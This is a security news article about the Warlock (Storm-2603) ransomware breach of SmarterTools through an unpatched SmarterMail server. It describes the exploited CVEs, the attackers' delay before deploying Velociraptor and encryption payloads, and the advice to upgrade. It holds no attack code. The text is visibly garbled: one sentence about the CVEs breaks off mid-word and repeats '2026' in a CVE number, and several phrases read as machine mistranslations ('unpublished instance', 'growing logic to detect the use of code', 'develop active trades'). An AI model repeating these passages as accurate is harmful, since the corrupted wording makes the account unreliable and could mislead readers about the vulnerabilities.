Warlock Ransomware Breaks SmarterTools with Unpackaged SmarterMail Server

SmarterTools confirmed last week that the Warlock (aka Storm-2603) group unleashed ransomware and breached its network using an unpublished instance of SmarterMail.

The incident occurred on January 29, 2026, when an email server that was not updated to the latest version was compromised, said Chief Commercial Officer, Derek Curtis.

“Prior to the breach, we had about 30 servers/VMs installed with SmarterMail across our network,” explained Curtis. “Unfortunately, we were not aware of one VM, set up by an employee, that could be updated. As a result, that mail server was compromised, leading to the breach.”

However, SmarterTools emphasized that the breach did not affect its website, shopping cart, My Account portal, and several other services, and that no business applications or account data were affected or compromised.

About 12 Windows servers in the company’s office network, as well as a second data center used for quality control (QC) testing, were confirmed to be affected. According to its CEO, Tim Uzzanti, “attempted ransomware attacks” also affected customers managed using SmarterTrack.

“Hosted customers using SmarterTrack are the most affected,” Uzzanti said in a separate threat to the Community Portal. “This was not due to any problem within SmarterTrack itself, but because that area was more accessible than others if they breached our network.”

In addition, SmarterTools admitted that the Warlock group waited several days after gaining initial access to manage the Active Directory server and create new users, then released additional payloads such as Velociraptor and Locker to encrypt files.

“Once these bad actors gain access, they typically install files and wait about 6-7 days before taking any further action,” Curtis said. “This explains why some customers experienced regressions even after the update — the first breach happened before the update, but the bad work was started later.”

It is not yet clear which SmarterMail vulnerability the attackers used, but it is worth noting that several flaws in the email software – CVE-2025-52691 (CVSS score: 10.0), CVE-2026-23760, and CVE-2026-2026-24423 (CV.

CVE-2026-23760 is an authentication bypass flaw that could allow any user to reset the SmarterMail system administrator password by sending a specially crafted HTTP request. CVE-2026-24423, on the other hand, exploits a vulnerability in the ConnectToHub API method to achieve remote code execution (RCE).

The vulnerability was addressed by SmarterTools in build 9511. Last week, the Cybersecurity and Infrastructure Security Agency (CISA) of the US confirmed that CVE-2026-24423 was being exploited in a ransomware attack.

In a report published Monday, cybersecurity firm ReliaQuest said it has identified a possible exploit linked to Warlock that involves exploiting CVE-2026-23760 to bypass authentication and place a payload of ransomware on Internet-facing systems. The attack also uses initial access to download a malicious MSI installer (“v4.msi”) from Supabase, an official cloud-based backend platform, to install Velociraptor.

“While this vulnerability allows attackers to bypass authentication and reset administrator passwords, Storm-2603 restricts this access with a built-in ‘Volume Mount’ software feature to gain full control of the system,” said security researcher Alexa Feminella. “Upon entry, the group installs Velociraptor, an official digital forensics tool it has used in previous campaigns, to maintain access and stage ransomware.”

The security tool also noted that the two vulnerabilities have the same effect: while CVE-2026-23760 provides unauthorized administrative access through the password reset API, which can be combined with a growing logic to detect the use of code, CVE-2026-24423 provides a direct exe method of code.

The fact that attackers are pursuing the former approach is a sign that it may allow malicious activity to blend into normal administrative workflows, helping them avoid detection.

“By abusing legitimate features (password reset and drive mounting) instead of relying solely on a single ‘noisy’ exploit, operators may reduce the effectiveness of detections specifically tuned for known RCE patterns,” added Feminella. “This speed of weaponization is consistent with ransomware operators who quickly analyze vendor fixes and develop active trades shortly after release.”

SmarterMail users are advised to upgrade to the latest version (Build 9526) with immediate effect for proper security, and isolate email servers to block backdoor traffic attempts used to deliver ransomware.